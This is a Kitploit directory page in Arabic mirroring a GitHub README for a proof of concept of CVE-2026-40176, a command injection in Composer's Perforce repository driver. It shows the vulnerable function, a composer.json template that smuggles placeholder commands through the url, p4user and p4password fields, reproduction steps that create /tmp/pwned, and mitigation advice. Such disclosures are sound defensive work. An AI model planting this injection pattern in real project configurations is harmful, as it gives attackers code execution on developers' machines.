Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-40176-cve-2026-40261 — إثبات مفهوم يوضح حقن الأوامر في مشغّل Perforce الخاص بـ Composer (CVE-2026-40176)، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر تكوين مستودع مُصمَّم خصيصًا. | Kitploit
أدوات/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةتطوير الحمولات
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

إثبات مفهوم يوضح حقن الأوامر في مشغّل Perforce الخاص بـ Composer (CVE-2026-40176)، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر تكوين مستودع مُصمَّم خصيصًا.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-40176

ثغرة تنفيذ الأكواد عن بُعد (RCE) في مستودع Perforce الخاص بـ Composer

Composer Version Severity Type


📋 الملخص

ثغرة حقن أوامر (Command Injection) في مشغّل مستودع Perforce الخاص بـ Composer تسمح بتنفيذ الأكواد عن بُعد (RCE) من خلال التحقق غير الكافي من المدخلات في معالجة عنوان المستودع.


🎯 تفاصيل الثغرة

الخاصيةالقيمة
معرف CVECVE-2026-40176
الإصدارات المتأثرةComposer < 2.2.27
نوع الثغرةحقن أوامر (Command Injection)
متجه الهجومإعداد مستودع خبيث
التأثيرتنفيذ أكواد عشوائية
درجة CVSSعالية/حرجة

🔍 الوصف الفني

توجد الثغرة في طريقة معالجة Composer عندما يكون النوع perforce. لا يتم تعقيم المعامل بشكل صحيح قبل تمريره إلى أوامر الصدفة، مما يسمح للمهاجمين بحقن أوامر نظام عشوائية.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

لم يتم تخطي كل ذلك بشكل صحيح، مما يسمح للمهاجم بحقن أوامر من خلال إنشاء حمولة خبيثة لجميع الحقول ذات النوع perforce.

نمط الكود القابل للاستغلال:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 إثبات المفهوم

يحتوي هذا المستودع على إثبات مفهوم عملي يوضح الثغرة.

هيكل المشروع

root@kitploit:~
CVE-2026-40176/
├── composer.json              # إعداد مستودع Perforce الخبيث
├── vuln-composer.phar         # Composer 2.2.26 (قابل للاستغلال)
├── patched-composer.phar      # Composer 2.2.27 (مُصحح)
└── README.md                  # هذا الملف

خطوات إعادة الإنتاج

1. استنساخ المستودع

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. التحقق من إصدارات Composer

root@kitploit:~
php vuln-composer.phar --version
# Output: Composer version 2.2.26

php patched-composer.phar --version
# Output: Composer version 2.2.27

3. اختبار الإصدار القابل للاستغلال

root@kitploit:~
php vuln-composer.phar install
# OR
php vuln-composer.phar update

4. التحقق من الاستغلال

root@kitploit:~
ls -la /tmp/pwned

5. اختبار الإصدار المُصحح (يجب أن يفشل)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# يجب ألا يوجد الملف (تم إصلاح الثغرة)

🛡️ التخفيف

إجراءات فورية

  1. قم بترقية Composer إلى الإصدار 2.2.27 أو أحدث:

    root@kitploit:~
    composer self-update --2.2.27
    # OR
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. راجع جميع ملفات composer.json بحثًا عن إعدادات مستودعات غير معروفة أو مشبوهة

  3. دقق سلسلة التوريد - تحقق مما إذا كانت أي تبعيات تشير إلى مستودعات غير موثوقة

الاكتشاف

root@kitploit:~
# تحقق من إصدار Composer لديك
composer --version

# ابحث عن مستودعات Perforce في مشاريعك
grep -r "perforce" */composer.json
تنزيل الأداة